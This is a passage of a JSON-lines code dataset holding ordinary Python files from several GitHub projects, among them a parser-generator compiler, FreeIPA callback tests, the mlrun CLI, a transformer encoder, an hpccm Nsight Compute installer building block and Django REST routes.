regular.PatternError):\n\t\t\traise grammar.DefinitionError('At line %d: %s'%(line_number, STRERROR[type(e)].format(e.args))) from None\n\t\telse:\n\t\t\traise grammar.DefinitionError('At line %d: Malformed pattern.' % line_number) from None\n\n\tdef definitions():\n\t\tname, subexpression = current_line_text.split(None, 1)\n\t\tregular.let_subexpression(env, name, subexpression)\n\t\n\tdef conditions():\n\t\t\"\"\"\n\t\tThe first token will be a condition name. 
Thereafter, maybe an arrow and one or more included groups.\n\t\tPattern groups named on the LEFT hand side are real start conditions, accessible in the final scanner.\n\t\tThose which appear only on the right hand side are \"virtual\", usable only by inclusion.\n\t\tAt some point it might be nice to add validation that these are all used correctly...\n\t\t\"\"\"\n\t\tname, includes = error_help.parse(current_line_text, line_number, \"condition\")\n\t\tif name in condition_definitions: error_help.gripe('Re-declared scan-condition %r; this is unexpected.'%name)\n\t\tcondition_definitions[name] = includes\n\n\tdef note_pattern(pattern_text):\n\t\t# Now patterns that share a trail length can also share a rule ID number.\n\t\ttry: rule_pattern = regular.analyze_pattern(pattern_text, env)\n\t\texcept regular.PatternError as e:\n\t\t\thandle_meta_exception(e, pattern_text)\n\t\telse: pending_patterns[rule_pattern.trail_code].append(rule_pattern)\n\n\tdef patterns():\n\t\t# This could be done better: a nice exercise might be to enhance the present regex parser to also\n\t\t# grok actual scanner rules as an alternate language start-symbol; such could eliminate some of\n\t\t# this contemptible string hackery and thereby enable things like embedded spaces where they make sense.\n\t\t# Such would also involve hacking the metascanner bootstrap code to track paren depth and recognize\n\t\t# the other tokens that can appear.\n\t\tif current_line_text.endswith('|'):\n\t\t\tpattern_text = current_line_text[:-1].strip()\n\t\t\tif re.search(r'\\s', pattern_text): raise grammar.DefinitionError('Unable to analyze pattern/same-as-next structure at line %d.'%line_number)\n\t\t\tnote_pattern(pattern_text)\n\t\telse:\n\t\t\tm = re.fullmatch(r'(.*?)\\s*:([A-Za-z][A-Za-z_]*)(?:\\s+([A-Za-z_]+))?(?:\\s+:(0|[1-9][0-9]*))?', current_line_text)\n\t\t\tif not m: raise grammar.DefinitionError('Unable to analyze overall pattern/action/argument/(rank) structure at line %d.'%line_number)\n\t\t\tpattern_text, action, argument, rank_string = m.groups()\n\t\t\tmessage = [action]\n\t\t\tif argument is not None: message.append(argument)\n\t\t\trank = int(rank_string) if rank_string else 0\n\t\t\tnote_pattern(pattern_text)\n\t\t\tfor trail_code, list_of_patterns in pending_patterns.items():\n\t\t\t\trule_id = foundation.allocate(scan_actions, ScanAction(trail_code, message, line_number))\n\t\t\t\tfor rule_pattern in list_of_patterns:\n\t\t\t\t\tdst = nfa.new_node(rank)\n\t\t\t\t\tnfa.final[dst] = rule_id\n\t\t\t\t\tencoder = regular.Encoder(nfa, annotation=rule_pattern.annotation, rank=rank)\n\t\t\t\t\tsrc = encoder(rule_pattern.tree, dst)\n\t\t\t\t\tfor q,b in zip(nfa.condition(current_pattern_group), rule_pattern.bol):\n\t\t\t\t\t\tif b: nfa.link_epsilon(q, src)\n\t\t\tpending_patterns.clear()\n\t\tpass\n\t\n\tdef precedence():\n\t\tebnf.read_precedence_line(current_line_text, line_number)\n\t\n\tdef productions():\n\t\tebnf.read_production_line(current_line_text, line_number)\n\t\n\tdef decide_section():\n\t\t# Looks at a header line to see which parsing mode/section to shift into based on a leading keyword,\n\t\t# and also performs any clerical duties associated with said shift.\n\t\ttokens = ''.join([c if c.isalnum() or c=='_' else ' ' for c in current_line_text]).split()\n\t\tif not tokens: return None\n\t\thead = tokens[0].lower()\n\t\tif head == 'definitions': return definitions\n\t\tif head == 'conditions':\n\t\t\t# The way to handle it is to set up epsilon-connections between the conditions\n\t\t\t# as specified in the source 
definition, and then delete \"virtual\" conditions\n\t\t\t# from nfa.initial before performing the subset construction. If no \"virtual\"\n\t\t\t# conditions are determined, then there's nothing to delete, and all groups get presented.\n\t\t\treturn conditions\n\t\tif head == 'patterns':\n\t\t\tnonlocal current_pattern_group\n\t\t\tcurrent_pattern_group = tokens[1] if len(tokens)>1 else INITIAL\n\t\t\treturn patterns\n\t\tif head in ('precedence', 'declarations'): return precedence\n\t\tif head == 'productions':\n\t\t\tebnf.current_head = None\n\t\t\tfor t in tokens[1:]:\n\t\t\t\tif t not in ebnf.plain_cfg.start:\n\t\t\t\t\tebnf.plain_cfg.start.append(t)\n\t\t\treturn productions\n\t\treturn None\n\n\t# The context-free portion of the definition:\n\terror_help = grammar.ErrorHelper(document.filename)\n\tebnf = grammar.EBNF_Definition(error_help, strict)\n\t\n\t# The regular (finite-state) portion of the definition:\n\tenv = charset.mode_normal.new_child(document.filename or \"text\")\n\tnfa = finite.NFA()\n\tpending_patterns = collections.defaultdict(list) # Those awaiting an application of the `|` action...\n\tscan_actions = [] # That of a regular-language rule entry is (trail_code, message, line_number)\n\tcurrent_pattern_group = None\n\tcondition_definitions = {}\n\t\n\tdef tie_conditions():\n\t\tdeclared = set(condition_definitions.keys())\n\t\tdeclared.update(*condition_definitions.values())\n\t\tforgot_to_define = declared - set(nfa.initial.keys())\n\t\tif forgot_to_define: raise grammar.DefinitionError('These pattern groups were declared in the conditions block but never defined:\\n'+repr(forgot_to_define))\n\t\tforgot_to_declare = set(nfa.initial.keys()) - declared\n\t\tif forgot_to_declare: raise grammar.DefinitionError('These pattern groups appear, but are not declared in the conditions block:\\n'+repr(forgot_to_declare))\n\t\t# TODO: Check for no cycles in the inclusion graph...\n\t\tvirtual_groups = declared - set(condition_definitions.keys())\n\t\tfor name, includes in condition_definitions.items():\n\t\t\tfor i in includes:\n\t\t\t\tnfa.link_condition(name, i)\n\t\tfor name in virtual_groups:\n\t\t\tdel nfa.initial[name]\n\n\t# Here begins the outermost layer of grammar definition parsing, which is to comprehend the\n\t# structure of a supplied mark-down document just enough to extract headers and code-blocks.\n\tsection, in_code, line_number = None, False, 0\n\tfor current_line_text in document.content.splitlines(keepends=False):\n\t\tline_number += 1\n\t\tif in_code:\n\t\t\tcurrent_line_text = current_line_text.strip()\n\t\t\tif '```' in current_line_text:\n\t\t\t\tin_code = False\n\t\t\t\tif pending_patterns: raise grammar.DefinitionError(\"Consecutive group of patterns lacks a scanner action before end of code block at line %d.\"%line_number)\n\t\t\telif current_line_text and section: section()\n\t\telif current_line_text.startswith('#'): section = decide_section()\n\t\telif current_line_text.strip().startswith('```'): in_code = True\n\t\telse: continue\n\tif in_code and section: raise grammar.DefinitionError(\"A code block fails to terminate before the end of the document.\")\n\t\n\t# Compose the control tables. (Compaction is elsewhere. 
Serialization will be straight JSON via standard library.)\n\tif condition_definitions: tie_conditions()\n\tcfg = ebnf.sugarless_form()\n\tif method is None:\n\t\thfa = ebnf.method(cfg)\n\telse:\n\t\thfa = method(cfg)\n\tstyle = GeneralizedStyle(len(hfa.graph)) if ebnf.is_nondeterministic else DeterministicStyle(ebnf.is_strict)\n\treturn IntermediateForm(nfa=nfa, scan_actions=scan_actions, hfa=hfa, cfg=cfg, parse_style=style,)\n\ndef encode_parse_rules(rules:list, constructors:list, origins:list) -> dict:\n\tassert isinstance(rules, list), type(rules)\n\treturn {'rules': rules, 'line_number': origins, 'constructor': constructors, }\n\n\n","repo_name":"kjosib/booze-tools","sub_path":"boozetools/macroparse/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":12443,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"63"} +{"seq_id":"74267309640","text":"from ipalib import errors\nfrom ipalib.plugins import baseldap\n\n\ndef test_exc_wrapper():\n \"\"\"Test the CallbackInterface._exc_wrapper helper method\"\"\"\n handled_exceptions = []\n\n class test_callback(baseldap.BaseLDAPCommand):\n \"\"\"Fake IPA method\"\"\"\n def test_fail(self):\n self._exc_wrapper([], {}, self.fail)(1, 2, a=1, b=2)\n\n def fail(self, *args, **kwargs):\n assert args == (1, 2)\n assert kwargs == dict(a=1, b=2)\n raise errors.ExecutionError('failure')\n\n instance = test_callback()\n\n # Test with one callback first\n\n @test_callback.register_exc_callback\n def handle_exception(self, keys, options, e, call_func, *args, **kwargs):\n assert args == (1, 2)\n assert kwargs == dict(a=1, b=2)\n handled_exceptions.append(type(e))\n\n instance.test_fail()\n assert handled_exceptions == [errors.ExecutionError]\n\n # Test with another callback added\n\n handled_exceptions = []\n\n def dont_handle(self, keys, options, e, call_func, *args, **kwargs):\n assert args == (1, 2)\n assert kwargs == dict(a=1, b=2)\n handled_exceptions.append(None)\n raise e\n test_callback.register_exc_callback(dont_handle, first=True)\n\n instance.test_fail()\n assert handled_exceptions == [None, errors.ExecutionError]\n\n\ndef test_callback_registration():\n class callbacktest_base(baseldap.CallbackInterface):\n _callback_registry = dict(test={})\n\n def test_callback(self, param):\n messages.append(('Base test_callback', param))\n\n def registered_callback(self, param):\n messages.append(('Base registered callback', param))\n callbacktest_base.register_callback('test', registered_callback)\n\n class SomeClass(object):\n def registered_callback(self, command, param):\n messages.append(('Registered callback from another class', param))\n callbacktest_base.register_callback('test', SomeClass().registered_callback)\n\n class callbacktest_subclass(callbacktest_base):\n pass\n\n def subclass_callback(self, param):\n messages.append(('Subclass registered callback', param))\n callbacktest_subclass.register_callback('test', subclass_callback)\n\n\n messages = []\n instance = callbacktest_base()\n for callback in instance.get_callbacks('test'):\n callback(instance, 42)\n assert messages == [\n ('Base test_callback', 42),\n ('Base registered callback', 42),\n ('Registered callback from another class', 42)]\n\n messages = []\n instance = callbacktest_subclass()\n for callback in instance.get_callbacks('test'):\n callback(instance, 42)\n assert messages == [\n ('Base test_callback', 42),\n ('Subclass registered callback', 42)]\n\n\ndef test_exc_callback_registration():\n messages = []\n class 
callbacktest_base(baseldap.BaseLDAPCommand):\n \"\"\"A method superclass with an exception callback\"\"\"\n def exc_callback(self, keys, options, exc, call_func, *args, **kwargs):\n \"\"\"Let the world know we saw the error, but don't handle it\"\"\"\n messages.append('Base exc_callback')\n raise exc\n\n def test_fail(self):\n \"\"\"Raise a handled exception\"\"\"\n try:\n self._exc_wrapper([], {}, self.fail)(1, 2, a=1, b=2)\n except Exception:\n pass\n\n def fail(self, *args, **kwargs):\n \"\"\"Raise an error\"\"\"\n raise errors.ExecutionError('failure')\n\n base_instance = callbacktest_base()\n\n class callbacktest_subclass(callbacktest_base):\n pass\n\n @callbacktest_subclass.register_exc_callback\n def exc_callback(self, keys, options, exc, call_func, *args, **kwargs):\n \"\"\"Subclass's private exception callback\"\"\"\n messages.append('Subclass registered callback')\n raise exc\n\n subclass_instance = callbacktest_subclass()\n\n # Make sure exception in base class is only handled by the base class\n base_instance.test_fail()\n assert messages == ['Base exc_callback']\n\n\n @callbacktest_base.register_exc_callback\n def exc_callback(self, keys, options, exc, call_func, *args, **kwargs):\n \"\"\"Callback on super class; doesn't affect the subclass\"\"\"\n messages.append('Superclass registered callback')\n raise exc\n\n # Make sure exception in subclass is only handled by both\n messages = []\n subclass_instance.test_fail()\n assert messages == ['Base exc_callback', 'Subclass registered callback']\n","repo_name":"hatchetation/freeipa","sub_path":"tests/test_xmlrpc/test_baseldap_plugin.py","file_name":"test_baseldap_plugin.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"873017016","text":"class Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n for i in range(len(nums2)):\n nums1.append(nums2[i])\n nums1.sort()\n print(nums1)\n if len(nums1)%2==0:\n k= int(len(nums1)/2)\n return (nums1[k]+nums1[k-1])/2\n else:\n return float(nums1[int((len(nums1)-1)/2)])\n","repo_name":"oyeadii/leetcodePython","sub_path":"004_medianOfTwoArrays.py","file_name":"004_medianOfTwoArrays.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33641989076","text":"from os import path\nimport click\nfrom ast import literal_eval\n\nfrom .run import run_start\nfrom .runtimes import RunError\nfrom .utils import run_keys, dict_to_yaml\n\n@click.group()\ndef main():\n pass\n\n@main.command(context_settings=dict(ignore_unknown_options=True))\n@click.argument(\"url\", type=str)\n@click.option('--param', '-p', default='', multiple=True,\n help=\"parameter name and value tuples, e.g. 
-p x=37 -p y='text'\")\n@click.option('--in-artifact', '-i', multiple=True, help='input artifact')\n@click.option('--out-artifact', '-o', multiple=True, help='output artifact')\n@click.option('--in-path', help='default input path/url (prefix) for artifact')\n@click.option('--out-path', help='default output path/url (prefix) for artifact')\n@click.option('--secrets', '-s', multiple=True, help='secrets file=<filename> or env=ENV_KEY1,..')\n@click.option('--uid', help='unique run ID')\n@click.option('--name', help='run name')\n@click.option('--workflow', help='workflow name/id')\n@click.option('--project', help='project name/id')\n@click.option('--rundb', default='', help='save run results to path or DB url')\n@click.option('--runtime', '-r', default='', help='runtime environment e.g. local, remote, nuclio, mpi')\n@click.option('--kfp', is_flag=True, help='running inside Kubeflow Pipelines')\n@click.option('--hyperparam', '-x', default='', multiple=True,\n              help='hyper parameters (will expand to multiple tasks) e.g. --hyperparam p2=[1,2,3]')\n@click.option('--param-file', default='', help='path to csv table of execution (hyper) params')\n@click.argument('run_args', nargs=-1, type=click.UNPROCESSED)\ndef run(url, param, in_artifact, out_artifact, in_path, out_path, secrets, uid, name,\n        workflow, project, rundb, runtime, kfp, hyperparam, param_file, run_args):\n    \"\"\"Execute a task and inject parameters.\"\"\"\n\n    meta = {}\n    set_item(meta, uid, 'uid')\n    set_item(meta, name, 'name')\n    set_item(meta, project, 'project')\n    set_item(meta, workflow, 'workflow')\n\n    labels = {}\n    set_item(labels, workflow, 'workflow')\n    meta['labels'] = labels\n\n    if runtime:\n        runtime = py_eval(runtime)\n        if isinstance(runtime, str):\n            runtime = {'kind': runtime}\n    else:\n        runtime = {'kind': ''}\n\n    spec = {'runtime': runtime}\n    set_item(spec['runtime'], run_args, 'args', list(run_args))\n    set_item(spec['runtime'], url, 'command')\n\n    if param:\n        spec['parameters'] = fill_params(param)\n    if hyperparam:\n        hyperparam = fill_params(hyperparam)\n\n    set_item(spec, in_artifact, run_keys.input_objects, line2keylist(in_artifact))\n    set_item(spec, in_path, run_keys.input_path)\n    set_item(spec, out_path, run_keys.output_path)\n    set_item(spec, out_artifact, run_keys.output_artifacts, line2keylist(out_artifact))\n    set_item(spec, secrets, run_keys.secrets, line2keylist(secrets, 'kind', 'source'))\n\n    struct = {'metadata': meta, 'spec': spec}\n    try:\n        resp = run_start(struct, rundb=rundb, kfp=kfp,\n                         hyperparams=hyperparam, param_file=param_file)\n    except RunError as err:\n        print(f'runtime error: {err}')\n        exit(1)\n    if resp:\n        print(dict_to_yaml(resp))\n\n\ndef fill_params(param):\n    params_dict = {}\n    # avoid shadowing the incoming tuple by reusing its name for the loop variable\n    for p in param:\n        i = p.find('=')\n        if i == -1:\n            continue\n        key, value = p[:i].strip(), p[i + 1:].strip()\n        if key is None:\n            raise ValueError(f'cannot find param key in line ({p})')\n        params_dict[key] = py_eval(value)\n    return params_dict\n\n\ndef py_eval(data):\n    try:\n        value = literal_eval(data)\n        return value\n    except (SyntaxError, ValueError):\n        return data\n\n\ndef set_item(struct, item, key, value=None):\n    if item:\n        if value:\n            struct[key] = value\n        else:\n            struct[key] = item\n\n\ndef line2keylist(lines: list, keyname='key', valname='path'):\n    out = []\n    for line in lines:\n        i = line.find('=')\n        if i == -1:\n            raise ValueError('cannot find \"=\" in line ({}={})'.format(keyname, valname))\n        key, value = line[:i].strip(), line[i + 1:].strip()\n        if key is None:\n            raise ValueError('cannot find key in line 
({}={})'.format(keyname, valname))\n value = path.expandvars(value)\n out += [{keyname: key, valname: value}]\n return out\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"kkasravi/mlrun","sub_path":"mlrun/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"39423121720","text":"import torch\nfrom torch._C import dtype\nimport torch.nn as nn\nfrom model.embedding_layer import Embeddings\nfrom model.multi_headed_attn import MultiHeadedAttention\nfrom model.position_ffn import PositionwiseFeedForward\nfrom model.position_ffn import ActivationFunction\nfrom model.utils import sequence_mask_\n\nclass SITLayer(nn.Module):\n \"\"\"\n A single layer of the transformer encoder.\n\n Args:\n d_model (int): the dimension of keys/values/queries in\n MultiHeadedAttention, also the input size of\n the first-layer of the PositionwiseFeedForward.\n heads (int): the number of head for MultiHeadedAttention.\n d_ff (int): the second-layer of the PositionwiseFeedForward.\n dropout (float): dropout probability(0-1.0).\n pos_ffn_activation_fn (ActivationFunction):\n activation function choice for PositionwiseFeedForward layer\n \"\"\"\n\n def __init__(self, d_model, heads, d_ff, dropout, attention_dropout,\n pos_ffn_activation_fn=ActivationFunction.relu):\n super(SITLayer, self).__init__()\n\n self.self_attn = MultiHeadedAttention(\n heads, d_model, dropout=attention_dropout)\n self.feed_forward = PositionwiseFeedForward(d_model, d_ff, dropout,\n pos_ffn_activation_fn)\n self.layer_norm = nn.LayerNorm(d_model, eps=1e-6)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, inputs, mask):\n \"\"\"\n Args:\n inputs (FloatTensor): ``(batch_size, src_len, model_dim)``\n mask (LongTensor): ``(batch_size, 1, src_len)``\n Returns:\n (FloatTensor):\n * outputs ``(batch_size, src_len, model_dim)``\n \"\"\"\n assert mask is not None\n assert inputs.size(0) == mask.size(0)\n assert inputs.size(1) == mask.size(2)\n\n input_norm = self.layer_norm(inputs)\n context, _ = self.self_attn(input_norm, input_norm, input_norm,\n mask=mask)\n out = self.dropout(context) + inputs\n return self.feed_forward(out)\n\n def update_dropout(self, dropout, attention_dropout):\n self.self_attn.update_dropout(attention_dropout)\n self.feed_forward.update_dropout(dropout)\n self.dropout.p = dropout\n\n\nclass SIT(nn.Module):\n \"\"\"\n Args:\n num_layers (int): number of encoder layers\n d_model (int): size of the model\n heads (int): number of heads\n d_ff (int): size of the inner FF layer\n dropout (float): dropout parameters\n embeddings: embeddings to use, should have positional encodings\n pos_ffn_activation_fn (ActivationFunction): activation function choice for PositionwiseFeedForward layer\n\n Returns:\n (torch.FloatTensor, torch.FloatTensor):\n\n * embeddings ``(src_len, batch_size, model_dim)``\n * memory_bank ``(src_len, batch_size, model_dim)``\n \"\"\"\n\n def __init__(self, d_model, heads, d_ff, dropout,\n attention_dropout, num_layers, embedding,\n pos_ffn_activation_fn=ActivationFunction.relu):\n super(SIT, self).__init__()\n self.embedding = embedding\n\n self.padding_idx = embedding.word_padding_idx\n\n self.sit_layers = nn.ModuleList(\n [SITLayer(\n d_model, heads, d_ff, dropout, attention_dropout,\n pos_ffn_activation_fn=pos_ffn_activation_fn)\n for _ in range(num_layers)])\n self.layer_norm = nn.LayerNorm(d_model, eps=1e-6)\n\n def forward(self,sentence_phrases, 
phrases_len):\n        '''\n        Args:\n            sentence_phrases [batch size X max phrase count X max phrase length]\n            phrases_len [batch size X max phrase count]\n        Returns:\n            out [max phrase count X batch size X model dim]\n            lengths [batch size]\n\n        '''\n        # embed the phrases and sanity-check the input shapes\n        batch_size = sentence_phrases.size(0)\n        assert batch_size == phrases_len.size(0)\n        max_phrase_count = phrases_len.size(1)\n        assert max_phrase_count == sentence_phrases.size(1)\n\n        out = self.embed_phrases(sentence_phrases, phrases_len)\n\n        lengths = (phrases_len!=0).sum(dim=1)\n        mask = ~sequence_mask_(lengths).unsqueeze(1)\n        # Run the forward pass of every layer.\n        for layer in self.sit_layers:\n            out = layer(out, mask)\n        out = self.layer_norm(out)\n        assert out.shape[1] == lengths.max()\n\n        return out.transpose(0, 1).contiguous(), lengths\n\n    def embed_phrases(self, sentence_phrases, phrases_len):\n        '''\n        Args:\n            sentence_phrases [batch size X max phrase count X max phrase length]\n            phrases_len [batch size X max phrase count]\n        Returns:\n            [batch size X max phrase count X model dim]\n        '''\n        emb = self.embedding(sentence_phrases.unsqueeze(-1).contiguous())\n        emb = emb.sum(dim=2)/(phrases_len.unsqueeze(-1) + 1e-10)\n        return emb\n\n    def update_dropout(self, dropout, attention_dropout):\n        self.embedding.update_dropout(dropout)\n        for layer in self.sit_layers:\n            layer.update_dropout(dropout, attention_dropout)","repo_name":"Shikhar-S/Segmented-Invocation-Transformer","sub_path":"src/model/segment_encoder.py","file_name":"segment_encoder.py","file_ext":"py","file_size_in_byte":5254,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"}
{"seq_id":"70946454601","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nimport os\n\nfrom distutils.version import StrictVersion\nimport posixpath\n\nimport hpccm.config\nimport hpccm.templates.envvars\n\nfrom hpccm.building_blocks.base import bb_base\nfrom hpccm.building_blocks.packages import packages\nfrom hpccm.building_blocks.generic_build import generic_build\nfrom hpccm.common import cpu_arch, linux_distro\nfrom hpccm.primitives.comment import comment\nfrom hpccm.primitives.environment import environment\n\nclass nsight_compute(bb_base, hpccm.templates.envvars):\n    \"\"\"The `nsight_compute` building block downloads and installs the\n    [NVIDIA Nsight Compute\n    profiler](https://developer.nvidia.com/nsight-compute).\n\n    # Parameters\n\n    eula: Required, by setting this value to `True`, you agree to the\n    Nsight Compute End User License Agreement that is displayed when\n    running the installer interactively. The default value is\n    `False`.\n\n    ospackages: List of OS packages to install prior to building.\n    When using a runfile, the default values are `perl` for Ubuntu and\n    `perl` and `perl-Env` for RHEL-based Linux distributions.\n    Otherwise, the default values are `apt-transport-https`,\n    `ca-certificates`, `gnupg`, and `wget` for Ubuntu and an empty\n    list for RHEL-based Linux distributions.\n\n    prefix: The top level install prefix. The default value is\n    `/usr/local/NVIDIA-Nsight-Compute`. This parameter is ignored\n    unless `runfile` is set.\n\n    runfile: Path or URL to NSight Compute's `.run` file relative to the\n    local build context. The default value is empty.\n\n    version: the version of Nsight Compute to install. Note when\n    `runfile` is set this parameter is ignored. 
The default value is\n `2022.4.0`.\n\n # Examples\n\n ```python\n nsight_compute(version='2020.4.0')\n ```\n\n ```python\n nsight_compute(eula=True, runfile='nsight-compute-linux-2020.2.0.18-28964561.run')\n ```\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialize building block\"\"\"\n\n super(nsight_compute, self).__init__(**kwargs)\n\n self.__arch_label = '' # Filled in __cpu_arch\n self.__distro_label = '' # Filled in by __distro\n self.__eula = kwargs.get('eula', False)\n self.__ospackages = kwargs.get('ospackages', [])\n self.__prefix = kwargs.get('prefix',\n '/usr/local/NVIDIA-Nsight-Compute')\n self.__runfile = kwargs.get('runfile', None)\n self.__version = kwargs.get('version', '2022.4.0')\n self.__wd = kwargs.get('wd', posixpath.join(\n hpccm.config.g_wd, 'nsight_compute')) # working directory\n\n # Set the Linux distribution specific parameters\n self.__distro()\n\n # Disables deployment of section files to prevent warning\n # when there is no home or home is read-only:\n self.environment_variables[\n 'NV_COMPUTE_PROFILER_DISABLE_STOCK_FILE_DEPLOYMENT'\n ] = '1'\n\n if self.__runfile:\n # Runfile based installation\n if not self.__eula:\n raise RuntimeError('Nsight Compute EULA was not accepted.')\n\n self.__instructions_runfile()\n\n else:\n # Package repository based installation\n\n # Set the CPU architecture specific parameters\n self.__cpu_arch()\n\n # Fill in container instructions\n self.__instructions_repository()\n\n def __cpu_arch(self):\n \"\"\"Based on the CPU architecture, set values accordingly. A user\n specified value overrides any defaults.\"\"\"\n\n if hpccm.config.g_cpu_arch == cpu_arch.AARCH64:\n self.__arch_label = 'arm64'\n elif hpccm.config.g_cpu_arch == cpu_arch.PPC64LE:\n if hpccm.config.g_linux_distro == linux_distro.UBUNTU:\n self.__arch_label = 'ppc64el'\n else:\n self.__arch_label = 'ppc64le'\n elif hpccm.config.g_cpu_arch == cpu_arch.X86_64:\n if hpccm.config.g_linux_distro == linux_distro.UBUNTU:\n self.__arch_label = 'amd64'\n else:\n self.__arch_label = 'x86_64'\n else: # pragma: no cover\n raise RuntimeError('Unknown CPU architecture')\n\n def __distro(self):\n \"\"\"Based on the Linux distribution, set values accordingly. 
A user\n specified value overrides any defaults.\"\"\"\n\n if hpccm.config.g_linux_distro == linux_distro.UBUNTU:\n if not self.__ospackages:\n if self.__runfile:\n self.__ospackages = ['perl', 'wget']\n else:\n self.__ospackages = ['apt-transport-https',\n 'ca-certificates', 'gnupg', 'wget']\n\n if hpccm.config.g_linux_version >= StrictVersion('22.04'):\n self.__distro_label = 'ubuntu2204'\n elif hpccm.config.g_linux_version >= StrictVersion('20.04'):\n self.__distro_label = 'ubuntu2004'\n elif hpccm.config.g_linux_version >= StrictVersion('18.0'):\n self.__distro_label = 'ubuntu1804'\n else:\n self.__distro_label = 'ubuntu1604'\n\n elif hpccm.config.g_linux_distro == linux_distro.CENTOS:\n if not self.__ospackages:\n if self.__runfile:\n self.__ospackages = ['perl', 'perl-Env', 'wget']\n\n if hpccm.config.g_linux_version >= StrictVersion('8.0'):\n self.__distro_label = 'rhel8'\n else:\n self.__distro_label = 'rhel7'\n\n else: # pragma: no cover\n raise RuntimeError('Unknown Linux distribution')\n\n def __instructions_repository(self):\n \"\"\"Fill in container instructions\"\"\"\n\n self += comment('NVIDIA Nsight Compute {}'.format(self.__version))\n\n if self.__ospackages:\n self += packages(ospackages=self.__ospackages)\n\n self += packages(\n apt_keys=['https://developer.download.nvidia.com/devtools/repos/{0}/{1}/nvidia.pub'.format(self.__distro_label, self.__arch_label)],\n apt_repositories=['deb [signed-by=/usr/share/keyrings/nvidia.gpg] https://developer.download.nvidia.com/devtools/repos/{0}/{1}/ /'.format(self.__distro_label, self.__arch_label)],\n # https://github.com/NVIDIA/hpc-container-maker/issues/367\n force_add_repo=True,\n ospackages=['nsight-compute-{}'.format(self.__version)],\n yum_keys=['https://developer.download.nvidia.com/devtools/repos/{0}/{1}/nvidia.pub'.format(self.__distro_label, self.__arch_label)],\n yum_repositories=['https://developer.download.nvidia.com/devtools/repos/{0}/{1}'.format(self.__distro_label, self.__arch_label)],\n _apt_key=False)\n\n # The distro packages do not link nsight-compute binaries to /usr/local/bin\n self.environment_variables['PATH'] = '/opt/nvidia/nsight-compute/{}:$PATH'.format(self.__version)\n self += environment(variables=self.environment_step())\n\n def __instructions_runfile(self):\n \"\"\"Fill in container instructions\"\"\"\n\n pkg = os.path.basename(self.__runfile)\n\n install_cmds = [\n 'sh ./{} --nox11 -- -noprompt -targetpath={}'.format(\n pkg, self.__prefix)\n ]\n\n # Commands needed to predeploy target-specific files. 
When\n # connecting through the GUI on another machine to the\n # container, this removes the need to copy the files over.\n install_cmds += [\n 'mkdir -p /tmp/var/target',\n 'ln -sf {}/target/* /tmp/var/target'.format(self.__prefix),\n 'ln -sf {}/sections /tmp/var/'.format(self.__prefix),\n 'chmod -R a+w /tmp/var'\n ]\n\n kwargs = {}\n if self.__runfile.strip().startswith(('http://', 'https://')):\n kwargs['url'] = self.__runfile\n else:\n kwargs['package'] = self.__runfile\n\n self.__bb = generic_build(\n annotations={'runfile': pkg},\n base_annotation=self.__class__.__name__,\n comment = False,\n devel_environment={'PATH': '{}:$PATH'.format(self.__prefix)},\n directory=self.__wd,\n install=install_cmds,\n unpack=False,\n wd=self.__wd,\n **kwargs\n )\n\n self += comment('NVIDIA Nsight Compute {}'.format(pkg), reformat=False)\n self += packages(ospackages=self.__ospackages)\n self += self.__bb\n self += environment(variables=self.environment_variables)\n","repo_name":"NVIDIA/hpc-container-maker","sub_path":"hpccm/building_blocks/nsight_compute.py","file_name":"nsight_compute.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":418,"dataset":"github-code","pt":"63"} +{"seq_id":"1645574176","text":"from rest_framework.routers import SimpleRouter\nfrom core.user.viewsets import UserViewSet\nfrom core.auth.viewsets import LoginViewSet, RegistrationViewSet, RefreshViewSet\nfrom .viewsets import (\n CanvasViewSet,\n NoteViewSet,\n CombatTrackerViewSet,\n CharacterViewSet,\n UserWorkspaceViewset,\n WorkspaceCanvasViewSet,\n NoteCanvasViewSet,\n CombatTrackerCanvasViewSet,\n CombatTrackerCharacterViewSet,\n WorkspaceViewset,\n)\n\n\nroutes = SimpleRouter()\n\n# AUTHENTICATION\nroutes.register(r\"auth/login\", LoginViewSet, basename=\"auth-login\")\nroutes.register(r\"auth/register\", RegistrationViewSet, basename=\"auth-register\")\nroutes.register(r\"auth/refresh\", RefreshViewSet, basename=\"auth-refresh\")\n\n\nroutes.register(r\"canvas\", CanvasViewSet, basename=\"add-canvas\")\nroutes.register(r\"note\", NoteViewSet, basename=\"add-note\")\nroutes.register(r\"combatTracker\", CombatTrackerViewSet, basename=\"add-combatTracker\")\nroutes.register(r\"character\", CharacterViewSet, basename=\"add-character\")\n\nroutes.register(r\"user/workspace\", UserWorkspaceViewset, basename=\"user-workspace\")\nroutes.register(r\"workspace\", WorkspaceViewset, basename=\"workspace\")\nroutes.register(\n r\"workspace/canvas\", WorkspaceCanvasViewSet, basename=\"workspace-canvas\"\n)\nroutes.register(r\"canvas/note\", NoteCanvasViewSet, basename=\"canvas-note\")\nroutes.register(\n r\"canvas/combat_tracker\",\n CombatTrackerCanvasViewSet,\n basename=\"canvas-combat_tracker\",\n)\nroutes.register(\n r\"combat_tracker/character\",\n CombatTrackerCharacterViewSet,\n basename=\"combat_tracker-character\",\n)\n\n# USER\nroutes.register(r\"user\", UserViewSet, basename=\"user\")\n\n\nurlpatterns = [*routes.urls]\n","repo_name":"LukaCrabbe/Final_Work","sub_path":"backend/CoreRoot/core/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7254684163","text":"import collections\nimport pygame\n\nfrom Globals import 